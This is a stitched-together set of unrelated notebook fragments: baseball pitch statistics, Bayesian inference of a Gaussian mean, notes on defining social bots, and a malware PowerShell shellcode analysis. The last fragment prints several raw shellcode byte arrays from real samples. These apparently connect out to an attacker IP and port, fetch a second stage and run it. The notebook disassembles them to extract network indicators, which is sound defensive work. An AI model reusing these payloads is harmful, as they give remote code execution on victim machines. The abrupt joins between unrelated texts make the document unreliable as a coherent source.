fig, axes = plt.subplots(figsize=(15,8), ncols=len(metrics), nrows=3, sharex='col', squeeze=False)
fig.tight_layout(pad=3.0, h_pad=5.0)
cmap = plt.get_cmap('Paired')
for j, metric in enumerate(metrics):
for i, name in enumerate(sorted(sims.keys())):
ci = np.percentile(sims[name][metric], q=[2.5, 97.5])
axes[i,j].hist(sims[name][metric], color=cmap(1.*j/len(metrics)))
axes[i,j].axvline(ci[0], linestyle=':', color='k')
axes[i,j].axvline(ci[1], linestyle=':', color='k')
axes[i,j].xaxis.set_major_locator(MaxNLocator(nbins=4))
axes[i,j].set_title('{}: {}'.format(name.capitalize(), metric))
axes[i,j].spines['top'].set_visible(False)
axes[i,j].spines['left'].set_visible(False)
axes[i,j].spines['right'].set_visible(False)
# -
# # Pitch f/x
arrietaPitches = pd.read_csv('data/pitchfx/arrieta.csv', parse_dates=['game_date'])
greinkePitches = pd.read_csv('data/pitchfx/greinke.csv', parse_dates=['game_date'])
kershawPitches = pd.read_csv('data/pitchfx/kershaw.csv', parse_dates=['game_date'])
# ## Add some columns to make things easier
arrietaPitches.pitch_result.value_counts()
arrietaPitches.atbat_result.value_counts()
# +
# if it's not a ball, it's a strike
ball_vals = ['Ball', 'Ball In Dirt', 'Intent Ball', 'Hit By Pitch']
swing_and_miss = ['Swinging Strike', 'Swinging Strike (Blocked)', 'Missed Bunt']
hit_vals = ['Single', 'Double', 'Triple', 'Home Run']
arrietaPitches.loc[arrietaPitches.pitch_result.isin(ball_vals), 'is_strike'] = 0
arrietaPitches.loc[arrietaPitches.is_strike != 0, 'is_strike'] = 1
arrietaPitches.loc[arrietaPitches.pitch_result.isin(swing_and_miss), 'swing_and_miss'] = 1
arrietaPitches.loc[arrietaPitches.atbat_result.isin(hit_vals), 'is_hit'] = 1
arrietaPitches.loc[arrietaPitches.atbat_result == 'Single', 'total_bases'] = 1
arrietaPitches.loc[arrietaPitches.atbat_result == 'Double', 'total_bases'] = 2
arrietaPitches.loc[arrietaPitches.atbat_result == 'Triple', 'total_bases'] = 3
arrietaPitches.loc[arrietaPitches.atbat_result == 'Home Run', 'total_bases'] = 4
greinkePitches.loc[greinkePitches.pitch_result.isin(ball_vals), 'is_strike'] = 0
greinkePitches.loc[greinkePitches.is_strike != 0, 'is_strike'] = 1
kershawPitches.loc[kershawPitches.pitch_result.isin(ball_vals), 'is_strike'] = 0
kershawPitches.loc[kershawPitches.is_strike != 0, 'is_strike'] = 1
# -
# ### Who gets hit harder - Arrieta vs. Greinke vs. Kershaw
# +
fig, axes = plt.subplots(ncols=3, sharex=True, sharey=True, figsize=(14,5))
arrietaPitches.batted_ball_velocity.hist(ax=axes[0], bins=20, label='Arrieta', alpha=.5, color=ja)
axes[0].set_title('Arrieta BB Velocity')
greinkePitches.batted_ball_velocity.hist(ax=axes[1], bins=20, label='Greinke', alpha=.5, color=zg)
axes[1].set_title('Greinke BB Velocity')
kershawPitches.batted_ball_velocity.hist(ax=axes[2], bins=20, label='Kershaw', alpha=.5, color='grey')
axes[2].set_title('Kershaw BB Velocity');
# +
bbtypes = ['GB', 'LD', 'FB', 'PU']
pitchers = {'Arrieta': arrietaPitches, 'Greinke': greinkePitches, 'Kershaw': kershawPitches}
row_titles = ['{}'.format(row_title) for row_title in pitchers.keys()]
col_titles = ['{}'.format(col_title) for col_title in bbtypes]
fig, axes = plt.subplots(figsize=(15,6), nrows=len(pitchers), ncols=len(bbtypes), sharex=True, sharey=True)
fig.tight_layout(pad=1.2, h_pad=1.5)
# label each column with stat name
for ax, col_title in zip(axes[0], col_titles):
ax.set_title(col_title, size=15)
# label each row with player name
for ax, row_title in zip(axes[:,0], row_titles):
ax.set_ylabel(row_title, rotation=0, size=15, labelpad=40)
for i, (name, df) in enumerate(pitchers.items()):
for j, bb in enumerate(bbtypes):
title = '{}: {}'.format(name, bb)
vals = df[df.batted_ball_type == bb]['batted_ball_velocity']
vals.hist(ax=axes[i,j], alpha=.5)
axes[i,j].axvline(np.mean(vals), color='r', linestyle='--', linewidth=1)
axes[i,j].tick_params(axis='both', which='major', labelsize=13)
axes[i,j].xaxis.set_major_locator(MaxNLocator(nbins=4))
# axes[i,j].spines['top'].set_visible(False)
# axes[i,j].spines['left'].set_visible(False)
# axes[i,j].spines['right'].set_visible(False)
# -
# ### Is it significant?
# +
np.random.seed(49)
arrietaBBs = arrietaPitches[arrietaPitches.batted_ball_velocity > 0].batted_ball_velocity
greinkeBBs = greinkePitches[greinkePitches.batted_ball_velocity > 0].batted_ball_velocity
kershawBBs = kershawPitches[kershawPitches.batted_ball_velocity > 0].batted_ball_velocity
arrietaSamples = []
greinkeSamples = []
kershawSamples = []
for i in range(1000):
arrietaSamples.append(np.random.choice(arrietaBBs, size=len(arrietaBBs), replace=True))
greinkeSamples.append(np.random.choice(greinkeBBs, size=len(greinkeBBs), replace=True))
kershawSamples.append(np.random.choice(kershawBBs, size=len(kershawBBs), replace=True))
arrietaMeans = [np.mean(obs) for obs in arrietaSamples]
greinkeMeans = [np.mean(obs) for obs in greinkeSamples]
kershawMeans = [np.mean(obs) for obs in kershawSamples]
fig, ax = plt.subplots(figsize=(10, 4))
plt.hist(arrietaMeans, alpha=.5, label='Arrieta', color=ja)
plt.hist(greinkeMeans, alpha=.6, label='Greinke', color=zg)
plt.hist(kershawMeans, alpha=.3, label='Kershaw', color=kc)
plt.legend(loc='best')
plt.xlabel('Avg. Batted Ball Velocity', fontsize=15)
ax.spines['right'].set_visible(False)
ax.spines['left'].set_visible(False)
ax.spines['top'].set_visible(False)
ax.xaxis.set_ticks_position('bottom')
plt.tick_params(axis='both', which='major', labelsize=13)
ax.get_yaxis().set_ticks([])
plt.savefig('images/avg-batted-ball-velocity.png', bbox_inches='tight', dpi=120);
# -
np.mean(greinkeMeans) - np.mean(arrietaMeans)
# Statistically, we can say that Greinke gets hit harder than both Arrieta and Kershaw, though we cannot say there's a difference between Arrieta and Kershaw.
greinkePitches.head(3)
# ### What is the relationship between batted ball velocity and batting average against these three?
arrietaHit = arrietaPitches[arrietaPitches.batted_ball_velocity.notnull()]
greinkeHit = greinkePitches[greinkePitches.batted_ball_velocity.notnull()]
kershawHit = kershawPitches[kershawPitches.batted_ball_velocity.notnull()]
print('# of pitches batted')
print('====================')
print('Arrieta: %s' % len(arrietaHit))
print('Greinke: %s' % len(greinkeHit))
print('Kershaw: %s' % len(kershawHit))
# ## How difficult is each of their particular pitches to hit?
print('Arrieta\n', arrietaPitches.pitch_type.value_counts())
print('Greinke\n', greinkePitches.pitch_type.value_counts())
print('Kershaw\n', kershawPitches.pitch_type.value_counts())
# ## Historical Cy Young Results
# +
def era_ranker(df):
df.sort_values('earned_run_avg', inplace=True)
df['ERA_rank'] = np.arange(len(df)) + 1
return df
def wins_ranker(df):
df.sort_values('W', ascending=False, inplace=True)
df['wins_rank'] = np.arange(len(df)) + 1
return df
# -
cy = pd.read_csv('data/cyyoung/results.csv')
cy['share'] = cy.share.str.replace('%', '').apply(int) / 100
winners = cy[cy['rank'] == 1]
cy = cy.groupby(['year', 'league']).apply(era_ranker).sort_values(['year', 'league'], ascending=False)
cy = cy.groupby(['year', 'league']).apply(wins_ranker).sort_values(['year', 'league'], ascending=False)
ranks = cy[['rank', 'player', 'W', 'earned_run_avg', 'earned_run_avg_plus', 'SV', 'wins_rank', 'ERA_rank']].reset_index()
ranks.drop(['level_2', 'level_3', 'level_4'], axis=1, inplace=True)
ranks.set_index(['year', 'league', 'player'], inplace=True)
ranks.loc[ranks['rank'] == 1, 'winner'] = 1
ranks.loc[ranks['rank'] != 1, 'winner'] = 0
ranks.reset_index(inplace=True)
g = ranks.groupby(['year', 'league', 'wins_rank', 'ERA_rank'])['winner'].sum().unstack([1, 0]).fillna(0)
rankings = g.sum(axis=1).unstack(1).fillna(0)
g.sum(axis=1).unstack(1).fillna(0).sum(axis=1)
rankings
# ### Closest Cy Young Races
cy.columns
diff = cy.groupby(['year', 'rank', 'league'])['share'].sum().unstack([2,1]).fillna(0)
(diff['AL'][1] - diff['AL'][2]).order()
| 30,910 |
/notebooks/Malware PowerShell shellcode analysis.ipynb
|
4085c7b145eb7b572593be06331497009949360f
|
[
"MIT"
] |
permissive
|
CyberMonitor/Shared
|
https://github.com/CyberMonitor/Shared
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 547,708 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# <h2>Bayesian Inference of the mean of a Gaussian</h2>
# <p>In this notebook, we will use Bayesian inference to infer the mean of a Gaussian. We assume that we observe $N$ values that have come from a Gaussian with mean $\mu$ and variancs $\sigma^2$. Assuming that we know $\sigma^2=1$, we would like to determine $\mu$.</p>
#
# <p>We start by defining a prior density on $\mu$. We will use a Gaussian as our likelihood will be Gaussian (as per our assumption above) and the Gaussian prior is conjugate to the Gaussian likelihood. We (arbitrarily - in real problems you should think carefully about prior values) choose a prior with mean $a=0$ and variance $b^2=1$</p>
import numpy as np
true_mu = 2.0
a = 0
b_sq = 1
sig_sq = 1
x = np.random.normal(true_mu,np.sqrt(sig_sq),(10,1))
# <p>The plot below shows our choice of prior density:</p>
# +
import pylab as plt
# %matplotlib inline
def normal_pdf(x,mu,sigma):
return (1.0/(sigma*np.sqrt(2*np.pi)))*np.exp(-(1.0/(2.0*sigma**2))*(x-mu)**2)
plotx = np.arange(-5,5,0.01)
plt.plot(plotx,normal_pdf(plotx,a,np.sqrt(b_sq)),'r')
plt.title('Prior density')
# -
# <p>Because we chose a conjugate prior-likelihood pair, we are able to compute the posterior analytically. From Bayes rule, we have:
# $$ p(\mu|x_1,\ldots,x_N,a,b^2,\sigma^2) = \frac{p(x_1,\ldots,x_N|\mu,\sigma^2)p(\mu|a,b^2)}{p(x_1,\ldots,x_N|\sigma^2,a,b^2)}$$
# The likelihood term can be factorised as:
# $$
# p(x_1,\ldots,x_N|\mu,\sigma^2) = \prod_{i=1}^N p(x_i|\mu,\sigma^2) = \prod_{i=1}^N {\cal N}(x_i|\mu,\sigma^2)
# $$
# Because the prior and likelihood are conjugate (both are Gaussian), we know that the posterior must be Gaussian. Given this, and the fact that the term in the denominator (the marginal likelihood) doesn't include $\mu$ and can be ignored, we're left with matching the $\mu$ terms in the posterior with those in the product of the likelihood and the prior. Ignoring the constant, the posterior can be written as:
# $$
# p(\mu|x_1,\ldots,x_N,a,b^2,\sigma^2) = {\cal N}(\mu|c,d^2) \propto \exp\left(-\frac{1}{2d^2}(\mu-c)^2\right)
# $$
# The product of the prior and the likelihood is proportional to:
# $$
# \exp\left(-\frac{1}{2b^2}(\mu-a)^2 - \frac{1}{2\sigma^2}\sum_{i=1}^N (x_i-\mu)^2 \right)
# $$
# To work out $c$ and $d^2$, we can match the $\mu$ and $\mu^2$ terms in the two expressions. Starting with $\mu^2$ we have:
# $$
# \mbox{Posterior}: -\frac{1}{2d^2},~~~~\mbox{Prior times likelihood}: -\frac{1}{2b^2} - \frac{N}{2\sigma^2}
# $$
# Therefore:
# $$
# -\frac{1}{2d^2} = -\frac{1}{2b^2} - \frac{N}{2\sigma^2}
# $$
# and
# $$
# d^2 = \left(\frac{1}{b^2} + \frac{N}{\sigma^2}\right)^{-1}
# $$
# To find $c$ we equate the $\mu$ terms:
# $$
# \mbox{Posterior}: \frac{c}{d^2},~~~~\mbox{Prior times likelihood}: \frac{a}{b^2} + \frac{\sum_{i=1}^N x_i}{\sigma^2}
# $$
# Therefore:
# $$
# \frac{c}{d^2} = \frac{a}{b^2} + \frac{\sum_{i=1}^N x_i}{\sigma^2}
# $$
# and
# $$
# c = d^2\left(\frac{a}{b^2} + \frac{\sum_{i=1}^N x_i}{\sigma^2}\right)
# $$
# <p>We now add the data one at a time, and see how the posterior density changes. In the plots, the red curve is the prior, the blue curve the posterior and the black circles the data. Remember that the posterior is over the mean value, so it may well not cover all of the data.</p>
all_c = []
all_d_sq = []
for i in np.arange(x.size):
d_sq = 1.0/(1.0/b_sq + (i+1.0)/sig_sq)
c = d_sq*(a/b_sq + x[0:i+1].sum()/sig_sq)
all_c.append(c)
all_d_sq.append(d_sq)
plt.figure()
plt.plot(plotx,normal_pdf(plotx,a,np.sqrt(b_sq)),'r')
plt.plot(plotx,normal_pdf(plotx,c,np.sqrt(d_sq)),'b')
plt.plot(x[0:i+1],np.zeros_like(x[0:i+1]),'ko',markersize=10)
# <p>We can also plot the evolution of the posterior mean ($c$) and variance ($d^2$).</p>
plt.plot(np.arange(x.size)+1,all_c,'k')
plt.plot([1,x.size+1],[true_mu,true_mu],'k--')
plt.xlabel('N')
plt.ylabel('c')
plt.plot(np.arange(x.size)+1,all_d_sq,'r')
plt.xlabel('N')
plt.ylabel('$d^2$')
ore thoroughly through the text.
#
# These are some of the different definitions that have been set up to highlight bots.
# Broadband for America
# Background: Emprata published a paper on the submitted comments to the FCC (Federal Communications Commission), analysing whether the comment sentiment was in favor/against the repeal of Title II. By setting up different parameters under which to analyse, it was found that more than 80% of comments were made by bots. Note, that this isn’t directed at highlighting bots on twitter, but on the website of the FCC.
#
# This is a review of the parameters they set up to distinguish bots from real users. It doesn’t eliminate bots from the dataset, but gives a possible measurement of how many of the comments made by bots. Instead they analysed the comments into different groupings of aforementioned parameters.
#
# #### Entire Dataset
# ALL - First they looked at all the comments made.
# Consider only domestic comments - Then they narrowed it down, only looking at domestic comments
# Consider only international comments - Only looking at international comments
# EXCLUDE FAKEMAILGENERATOR - excluding comments made by temporary e-mail address services. (einrot.com, jourrapide.com, armyspy.com, fleckens.hu, cuvox.de, rhyta.com, gustr.com, superrito.com, teleworm.com)
#
# Unique comments
# UNIQUE COMMENTS – Number of unique comments in the docket
# TRULY UNIQUE COMMENTS – Number of comments appearing only once in the docket
#
# #### Eliminating Duplicative Comments
# • ONE PER ADDRESS – Considers only the first comment for each unique address, city, state, ZIP code combination
# • ONE PER EMAIL – Considers only the first comment from each email address
# • ONE PER ADDRESS/EMAIL – Considers only the first comment from each unique address and email combination
#
# Considering only Valid Addresses (Considers sample address data through August 4, 2017)
# • VALID ADDRESS – Considers only comments where an exact address match was found
# • ONE PER VALID ADDRESS - Considers only the first comment from each valid address
#
# To prepare the data for analysis, we performed various data cleanup/transformation activities, including the following:
# • Removal of special characters, tabs, new lines, leading spaces, and trailing spaces
# • Transformation of text fields to upper case
# • Standardization of state field to two character State Abbreviation
# • Standardization of ZIP code field to five digits, including padding of leading zeros
# • Extraction of country name from the “international address” field • Removal of duplicate comment (allowing only one per submission ID)
#
# #### DARPA Twitter bot challenge
# (BotOrNot competed in this challenge and came in top 3)
# https://arxiv.org/ftp/arxiv/papers/1601/1601.05140.pdf - Bot detection approaches
#
# #### Background:
# In 2015, DARPA (Defense advanced research projects agency) performed the twitter bot challenge, with the goal of identifying influence-bots that supported pro vaccination discussions on twitter. 6 teams(2 universities and some private companies) competed, with Sentimetrix winning.
#
# This is a description of the bot detection approaches used in the competition. It is intended to make for a definition of twitter bots, although it isn’t fully conclusive, as Bots were, and still are, hard to detect, despite research innovations within this field.
#
# A big part of the detection of bots, comes from machine learning, but the teams found that machine learning itself wasn’t sufficient.
# They also had to look at;
# #### Tweet syntax
# Does the user post tweets whose syntax is similar to the natural language generation program called Eliza and auto-generation of language.
# The average number of hashtags, user mentions, links, special characters, retweets, geo-enabled tweets, percentage of tweets ending with punctuation, hashtag or link
# #### Tweet semantics
# Number of user posts related to vaccination
# Users general opinion of the subject in question (in this case anti-vaccination). Are there any contradictions between opinions?
# The most frequent topics the user tweets about
# The number of languages used by the user - if there are several languages being used, the rationale is that it has a higher tendency of being a bot
# Inconsistency and URL replacements in retweets which directs users to sites that pays the “bot”-makers.
#
# #### Temporal behaviour features
# Did the user linger between opinions over time?
# Did the user engage users with anti-vaccination opinions, and then switching to a different view?
# Are there regularities in the tweets, meaning is the tweets tweeted with some specific algorithmic time schedule?
# The duration of tweeting - is the user tweeting constantly for 10 minuts, for an hour etc.
# Average number of tweets per day
# Percentage of dropped followers
# Is there any abrupt changes in the users’ metadata? (followers, followees, posts).
#
# #### User profile features
# Did the user have a profile picture? From a stock site?
# Did the users profile have an associated URL? Was the URL meaningful, or just random numbers for example.
# How is the users twitter name? A standard string, or an integer?
# Number of posts/retweets/replies/mentions
# Number of followers/followings
# Number of sources used by the user such as mobile applications, desktop browsers, ‘null’ or anything else?
# GPS coordinate availability for user’s tweets
# Similarity of users to known bots
#
# #### Network features (We can make use of Gephi for doing this)
# Average deviation of user sentiment scores from those following and followees.
# In and out degree centrality
# Average clustering coefficient of retweet and mention network associated with each user
# Pagerank and betweenness centrality of users in both retweet and mention networks
# Variables related to star and clique networks associated with users.
# Number of known bots followed by a user - a user following several known bots is more likely to be a bot
# number/percentage of bots in the cluster that a user belonged to - if a clustering algorithm places the user in a cluster with many bots, he is more likely to be a bot.
#
# #### Socialbots and their friends (Robert W. Gehl & Maria Bakardjieva:
# The first definition that is presented in the book is what they call “a crisp technical definition”. It is made by engineers and it has its starting point in their research which was very innovative when it was done (page 1). It is as follows:
# “A socialbot is an automation software that controls an account on a par- ticular OSN [Online Social Network], and has the ability to perform basic activities such as posting a message and sending a connection request. What makes a socialbot different from self-declared bots (e.g., Twitter bots that post up-to-date weather forecasts) and spambots is that it is designed to be stealthy, that is, it is able to pass itself off as a human being “ (page 1).
# In this definition, the authors dissociate a socialbots from e.g. a Twitter bots, which is very relevant for our project. Its relevant in two different ways: at first, it outlines the big difference between socialbots and Twitter bots which is that socialbots are designed to be regarded as human beings. With this fact in mind the other relevant part is that the author of the definition wouldn’t regard Twitter bots that performs simple task as posting up-to-date weather forecast as a socialbot. Retweeting arguments related to a debate wouldn’t be considered more sophisticated than posting weather updates, or would it? For the Twitter bot to be part of a debate the owner of the bot must have some kind of part in the debate. If the owner wants the bot to partake in the debate and to send a certain message it requires some engineering of the bot so that it appears realistic.
#
# #### Characteristics of Social bots (definition 1):
# -designed to be stealthy (page 1)
#
# -designed to present a “self” (page 1)
#
# -designed to perform undesirable tasks (page 1)
#
# The second definition seems more concurrent in relation to our projects and experience. It is as follows:
#
# Socialbots are software processes that are programmed to appear to be human-generated within the context of social networking sites (SNSs) such as Facebook and Twitter. They achieve their ‘humanness’ by either mim icking other SNS users or through artificial intelligence that simulates human users of social networking sites. They share pictures, post status updates and Tweets, enter into conversations with other SNS users, and make and accept friend and follower requests. Importantly, they are designed to appear human to both SNS users as well as the SNS platform itself. Their goals are various, but often include shaping the online interactions and social networking practices of users (page 2).
# This definition differs from the first one in several ways. Taking in account the first line it is clear that this definition highlights the human aspect of these bots. They appear to be human-generated within a certain context.
#
# The definition explains the methodical way of making the bots intervene in social networks in ways that makes their appearance trustworthy. It is explained how it is done: “… by either mim icking other SNS users or through artificial intelligence that simulates human users of social networking sites. They share pictures, post status updates and Tweets, enter into conversations with other SNS users, and make and accept friend and follower requests”.
#
# The most important attribute to the “modern” Socialbots are their complex goals. In our case it is as mentioned in the definition: “…but often include shaping the online interactions and social networking practices of users”. The clear purpose of the bots is what is both really interesting but also complicated. This may not always appear transparent.
#
# #### Characteristics of Social bots (definition 2):
# -designed to be human-generated within the context of SNS (page 2)
#
# -designed to mimick other users of SNS to achieve “humanness” (page 2)
#
# -designed to intervene in social networking practices (page 2)
#
# ### Literature research
#
# We looked through the literature from the lecture to provide us with an overview of which literature could be interesting to work with. We came to the conclusion that Marres, Latour, Venturini, Bacchi, Suchman, Clarke and Graham are interesting to look at.
below uses the `connect` IP to call back for c2 commands. Let's look at how to extract IPs and ports from shellcode.
## modified from from c0a25828c491c50c94c95438a9240aec6c082069211909dc4d3e9c95fb054519
output = disassemble_shellcode('0x68,0xc0,0xa8,0x83,0x82,0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5')
output
# #### Extracting IP and Port numbers from shellcode
#
# Shellcode can call the winsock `connect` API to connect to a specified IP and port. Getting network indicators such as these
# can be valuable for defenders. The `connect` API is defined as follows (https://docs.microsoft.com/en-us/windows/desktop/api/winsock2/nf-winsock2-connect)
#
# ```
# int WSAAPI connect(
# SOCKET s,
# const sockaddr *name,
# int namelen
# );
# ```
# and takes the following structure. We can see it includes the port and IP address.
# ```
# struct sockaddr_in {
# short sin_family;
# u_short sin_port;
# struct in_addr sin_addr;
# char sin_zero[8];
# };
# ```
#
# The first two `PUSH` instructions in the sequence below set up the call to `connect` and contain the desired info:
# ```
# 0x00000000 68c0a88382 push 0x8283a8c0
# 0x00000005 680200115c push 0x5c110002--> IP 192.168.131.130:4444
# 0x0000000a 89e6 mov esi,esp
# 0x0000000c 6a10 push 16
# 0x0000000e 56 push esi
# 0x0000000f 57 push edi
# 0x00000010 6899a57461 push 0x6174a599
# 0x00000015 ffd5 call ebp --> ws2_32.dll!connect
# ```
#
# `0x8283a8c0` is the IP in DWORD form. Decode it as follows:
#
# ```
# hexIp = '0x8283a8c0'
# ip = f"{int(hexIp[8:10],16)}.{int(hexIp[6:8],16)}.{int(hexIp[4:6],16)}.{int(hexIp[2:4],16)}"
# ```
#
# `0x5c110002` contains the port in the high WORD. Decode it as follows:
# ```
# hexPort = '0x5c110002'
# port = int(hexPort[4:6]+ hexPort[2:4], 16)
# ```
# +
hexPort = '0x5c110002'
port = int(hexPort[4:6]+ hexPort[2:4], 16)
hexIp = '0x8283a8c0'
ip = f"{int(hexIp[8:10],16)}.{int(hexIp[6:8],16)}.{int(hexIp[4:6],16)}.{int(hexIp[2:4],16)}"
print(f"The IP:port is {ip}:{port}")
# -
# ## Example 2
## from sample b047458659666aae6f4c4fb83e1987ecafcc561218a91f37ba5dceef25b7564c
sh2 = "0xdb,0xcb,0xd9,0x74,0x24,0xf4,0x5a,0x29,0xc9,0xb8,0x59,0x8f,0x04,0xdf,0xb1,0x47,0x31,0x42,0x1a,0x03,0x42,0x1a,0x83,0xea,0xfc,0xe2,0xac,0x73,0xec,0x5d,0x4e,0x8c,0xed,0x01,0xc7,0x69,0xdc,0x01,0xb3,0xfa,0x4f,0xb2,0xb0,0xaf,0x63,0x39,0x94,0x5b,0xf7,0x4f,0x30,0x6b,0xb0,0xfa,0x66,0x42,0x41,0x56,0x5a,0xc5,0xc1,0xa5,0x8e,0x25,0xfb,0x65,0xc3,0x24,0x3c,0x9b,0x29,0x74,0x95,0xd7,0x9f,0x69,0x92,0xa2,0x23,0x01,0xe8,0x23,0x23,0xf6,0xb9,0x42,0x02,0xa9,0xb2,0x1c,0x84,0x4b,0x16,0x15,0x8d,0x53,0x7b,0x10,0x44,0xef,0x4f,0xee,0x57,0x39,0x9e,0x0f,0xfb,0x04,0x2e,0xe2,0x02,0x40,0x89,0x1d,0x71,0xb8,0xe9,0xa0,0x81,0x7f,0x93,0x7e,0x04,0x64,0x33,0xf4,0xbe,0x40,0xc5,0xd9,0x58,0x02,0xc9,0x96,0x2f,0x4c,0xce,0x29,0xfc,0xe6,0xea,0xa2,0x03,0x29,0x7b,0xf0,0x27,0xed,0x27,0xa2,0x46,0xb4,0x8d,0x05,0x77,0xa6,0x6d,0xf9,0xdd,0xac,0x80,0xee,0x6c,0xef,0xcc,0xc3,0x5c,0x10,0x0d,0x4c,0xd7,0x63,0x3f,0xd3,0x43,0xec,0x73,0x9c,0x4d,0xeb,0x02,0x8a,0x6e,0x23,0xac,0xdb,0x91,0xc4,0xcd,0xf2,0x55,0x90,0x9d,0x6c,0x7c,0x99,0x75,0x6d,0x81,0x4c,0xe3,0x67,0x15,0xaf,0x5c,0x3f,0x65,0x47,0x9f,0xc0,0x64,0x24,0x16,0x26,0x36,0x04,0x79,0xf7,0xf6,0xf4,0x39,0xa7,0x9e,0x1e,0xb6,0x98,0xbe,0x20,0x1c,0xb1,0x54,0xcf,0xc9,0xe9,0xc0,0x76,0x50,0x61,0x71,0x76,0x4e,0x0f,0xb1,0xfc,0x7d,0xef,0x7f,0xf5,0x08,0xe3,0x17,0xf5,0x46,0x59,0xb1,0x0a,0x7d,0xf4,0x3d,0x9f,0x7a,0x5f,0x6a,0x37,0x81,0x86,0x5c,0x98,0x7a,0xed,0xd7,0x11,0xef,0x4e,0x8f,0x5d,0xff,0x4e,0x4f,0x08,0x95,0x4e,0x27,0xec,0xcd,0x1c,0x52,0xf3,0xdb,0x30,0xcf,0x66,0xe4,0x60,0xbc,0x21,0x8c,0x8e,0x9b,0x06,0x13,0x70,0xce,0x96,0x6f,0xa7,0x36,0xed,0x81,0x7b"
output = disassemble_shellcode (sh2)
output
extract_annotations_from_output(output)
# ## Example 3
# +
## from sample 57d736142db616f180a3b67adf5506ccd233320d98161eca4f7f1a97b031ce60
sh3='%fc,%e8,%82,%00,%00,%00,%60,%89,%e5,%31,%c0,%64,%8b,%50,%30,%8b,%52,%0c,%8b,%52,%14,%8b,%72,%28,%0f,%b7,%4a,%26,%31,%ff,%ac,%3c,%61,%7c,%02,%2c,%20,%c1,%cf,%0d,%01,%c7,%e2,%f2,%52,%57,%8b,%52,%10,%8b,%4a,%3c,%8b,%4c,%11,%78,%e3,%48,%01,%d1,%51,%8b,%59,%20,%01,%d3,%8b,%49,%18,%e3,%3a,%49,%8b,%34,%8b,%01,%d6,%31,%ff,%ac,%c1,%cf,%0d,%01,%c7,%38,%e0,%75,%f6,%03,%7d,%f8,%3b,%7d,%24,%75,%e4,%58,%8b,%58,%24,%01,%d3,%66,%8b,%0c,%4b,%8b,%58,%1c,%01,%d3,%8b,%04,%8b,%01,%d0,%89,%44,%24,%24,%5b,%5b,%61,%59,%5a,%51,%ff,%e0,%5f,%5f,%5a,%8b,%12,%eb,%8d,%5d,%68,%33,%32,%00,%00,%68,%77,%73,%32,%5f,%54,%68,%4c,%77,%26,%07,%89,%e8,%ff,%d0,%b8,%90,%01,%00,%00,%29,%c4,%54,%50,%68,%29,%80,%6b,%00,%ff,%d5,%6a,%0a,%68,%c0,%a8,%2b,%54,%68,%02,%00,%02,%9a,%89,%e6,%50,%50,%50,%50,%40,%50,%40,%50,%68,%ea,%0f,%df,%e0,%ff,%d5,%97,%6a,%10,%56,%57,%68,%99,%a5,%74,%61,%ff,%d5,%85,%c0,%74,%0c,%ff,%4e,%08,%75,%ec,%68,%f0,%b5,%a2,%56,%ff,%d5,%6a,%00,%6a,%04,%56,%57,%68,%02,%d9,%c8,%5f,%ff,%d5,%8b,%36,%6a,%40,%68,%00,%10,%00,%00,%56,%6a,%00,%68,%58,%a4,%53,%e5,%ff,%d5,%93,%53,%6a,%00,%56,%53,%57,%68,%02,%d9,%c8,%5f,%ff,%d5,%01,%c3,%29,%c6,%75,%ee,%c3'.replace('%','0x')
output = disassemble_shellcode (sh3)
output
# -
extract_strings(sh3)
extract_annotations_from_output(output)
# ## Example 4
#from sample 51f15304ebdb1fe876e26257bcb3a1a3060c64f681bade52723b396d8abcdd0b
sh4 = '0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x6e,0x65,0x74,0x00,0x68,0x77,0x69,0x6e,0x69,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0x31,0xdb,0x53,0x53,0x53,0x53,0x53,0x68,0x3a,0x56,0x79,0xa7,0xff,0xd5,0x53,0x53,0x6a,0x03,0x53,0x53,0x68,0x5c,0x11,0x00,0x00,0xe8,0x98,0x00,0x00,0x00,0x2f,0x31,0x5a,0x34,0x69,0x34,0x00,0x50,0x68,0x57,0x89,0x9f,0xc6,0xff,0xd5,0x89,0xc6,0x53,0x68,0x00,0x32,0xe0,0x84,0x53,0x53,0x53,0x57,0x53,0x56,0x68,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x96,0x6a,0x0a,0x5f,0x68,0x80,0x33,0x00,0x00,0x89,0xe0,0x6a,0x04,0x50,0x6a,0x1f,0x56,0x68,0x75,0x46,0x9e,0x86,0xff,0xd5,0x53,0x53,0x53,0x53,0x56,0x68,0x2d,0x06,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x75,0x16,0x68,0x88,0x13,0x00,0x00,0x68,0x44,0xf0,0x35,0xe0,0xff,0xd5,0x4f,0x75,0xcd,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x68,0x00,0x00,0x40,0x00,0x53,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x53,0x89,0xe7,0x57,0x68,0x00,0x20,0x00,0x00,0x53,0x56,0x68,0x12,0x96,0x89,0xe2,0xff,0xd5,0x85,0xc0